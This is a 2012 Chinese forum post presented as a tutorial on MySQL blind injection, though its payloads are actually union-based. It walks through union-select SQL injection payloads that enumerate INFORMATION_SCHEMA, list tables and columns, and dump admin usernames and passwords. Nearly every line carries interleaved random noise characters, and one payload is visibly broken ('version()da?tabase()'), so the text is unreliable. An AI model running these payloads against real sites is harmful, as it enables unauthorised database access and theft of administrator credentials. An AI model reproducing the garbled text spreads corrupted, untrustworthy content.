本文介绍MYSQL盲注的一些语句和方法
: Q. X. L# C; s+ O* |: ^* Z5 o4 }: h& L4 r/ U" [
学习盲注前先了解下 IFORMATION_SCHEMA 库% ]+ W; ]" O" D0 @7 d/ V
0 C, D' {) e1 Q2 X9 kMysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有
3 ^8 d# K* J. O存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
( K# g; ]5 W$ y, x' }7 ]7 R( P1.得到所有数据库名:4 z$ c: A) e8 u& P
|SCHEMATA ->存储数据库名的表) {: e) ]3 b) R# h1 L6 T: ?, i2 o
|---字段:SCHEMA_NAME ->数据库名称
3 Q# ]7 M6 \4 d" i/ k5 |: d X
$ {6 X" { T/ ]|TABLES ->存储表名
/ o) N$ U+ y! i3 o1 {" C|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名0 b: @1 o3 x2 n0 D0 M' ]
|---字段:TABLE_NAME ->存储表的表名" e# Y/ j! u6 Y6 d" e6 |# ?
8 P4 K2 T8 z, a|COLUMNS ->存储的字段名表- w& t# f2 }: w& F( B+ V- a }
|---字段:TABLE_SCHEMA ->该字段所属数据库名
4 m* [# \% u- y0 @: E) d|---字段:TABLE_NAME ->存储所属表的名称) X+ o- W$ E. r% b; y: @# S
% `/ v3 R! Y/ [2 y9 k/ d|---字段:COLUMN_NAME ->该字段的名称
7 O- B' {0 w8 K6 l0 c: u. ~: Q8 H$ y4 W* J; L; Q5 [5 w
+ ~+ O8 M g v1 N6 O
8 W5 C1 m" R4 Y% ], y, L1 Z###########################################################################
% `2 M7 @4 P, J; \7 d
3 J7 N2 H9 K$ G2 G; Q' Q0x001 获取系统信息:8 j% y- z6 N5 n* r. k, ~; F6 J L8 w
( _0 W6 m/ b$ _2 c" ?# | c, S) xunion select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
0 t5 c0 e+ t* h1 ^8 G& t
q g) T P1 e2 e- L9 d9 `, G/*1 y' {4 P) C3 a. ]$ H0 c
6 c& z2 E/ T1 y+ Q: t@@global.version_compile_os 获取系统版本
- Q' L( m' Z( [' w, Q% ]
; _. B W. Z- A3 c- C@@datadir 数据库路径& V' g7 A% q( z* b Z0 B
database() 当前数据库名称( \8 \6 O6 e# ?
0x3c62723e 换行HEX值/ I9 o. P5 @: [
1 ?3 C8 l$ Q5 q# y0 F) t- G
*/
6 Y) ~; f' h8 v) ~
, c/ Y5 J2 f, R1 @1 L; O
! h0 |. m3 c* w" n* s$ d) n% {' c' i1 Q2 c: L# g( }
######################################################################
) H( ?- y* ~- u# I0 ~8 W# D- A% E. V- `" B6 \
0x002 获取表名- Q+ x" C5 I; S3 a' j( a
- G( c% b4 K. Q( w# d' u
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
# s/ X: m* e9 G4 S
; W1 K! S9 u$ ^& A, X) K1 ^
' {6 L; j( ^$ y$ v" ]- R, n4 `. N7 m, [# V! A/ ^
/*, G3 ]- X: h5 d1 k
2 L# [* q. s/ n" i1 U1 }' Y3 V0x67617264656e 为当前数据库名
" P7 l/ B' y$ a1 K( i' ~' t
) z* t& Z- l. P" o# ^group_concat(table_name) 使用group_concat函数 一步获得该库所有表名
- z2 O* J) {1 F( d
! H( s- x; u. P+ f4 I8 ]*/
3 ~; a) M* o+ ^+ I& z0 \, R8 j& E5 q1 a) b& ~
######################################################################
7 O3 ^. ~. J' K
$ C; R- Q0 l6 `, f' m$ K & M, p5 f! h# o
7 ]5 ?+ k8 D% I+ s3 |8 m! }9 m
0x003 获取字段' s. o$ o/ |# n7 O; G* c
. X1 B0 x m* T N" \' a6 \8 f+ z
union select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*
5 g1 d4 q+ J* W t& j7 a
# w; V: H% Z$ \/ @& Z/*
5 ^& y- `# q% i. N8 x
* e2 @$ v7 M w- Bgroup_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段2 U# h6 { p/ q
' {1 l9 T# [5 w7 M! C( C& K5 a# X! f
0x61646d696e ->选择一个表" Z3 l" q3 V2 S) c9 r
2 ], b2 S/ _; v* {# t. b: q' Z$ ]0x67617264656e ->数据库名/ Q' L* d* O' y/ x, D9 Y$ ^
1 S# x7 U: d6 O1 Y8 _ g*/
4 B. E" d$ ?8 g( ~- _0 j. o1 q6 E- U* N# Z& u( F6 c. _* u/ W
#####################################################################
9 {6 ^6 U% J5 s( @. V" g+ ^7 L5 z" i+ O' L& J+ Z
4 O# y* A+ }$ g; }9 H8 E
; a/ j2 F$ u2 z* k1 B8 w6 a0x004 获取数据
. W9 Z6 y$ B0 E+ l
6 z- l0 h* U) }" W, J4 p/ j2 punion select 1,2,3
6 l* E4 P1 d- _, p' [5 U,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
& |. F k5 c1 X
9 Q% e' b5 Q/ junion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin% {* C8 M) A& l H4 P/ M
( K1 R$ x [3 N& Y. B/ Z
( i& |& ~; n. {3 V) a u$ c5 r9 m# E
/*8 J* Q% R9 q6 U. _% E& Z0 p7 d
0 d8 Y) C" J3 |1 [+ R5 H0x3c62723e 换行符号HEX编码
& P/ E4 u: d% l; a; p0 K3 K
9 b, p3 I! {5 Jgroup_concat 同时获得该字段所有数据; ?$ T$ ?/ Y7 k& E5 U
1 T- G6 X( {2 p) @* \*/- G, }2 _( l; e' F6 t& Y& {" e, c P: o
/ y2 T9 I# }4 @- m- b |
发表于 2012-9-13 17:48:44
收藏
支持
反对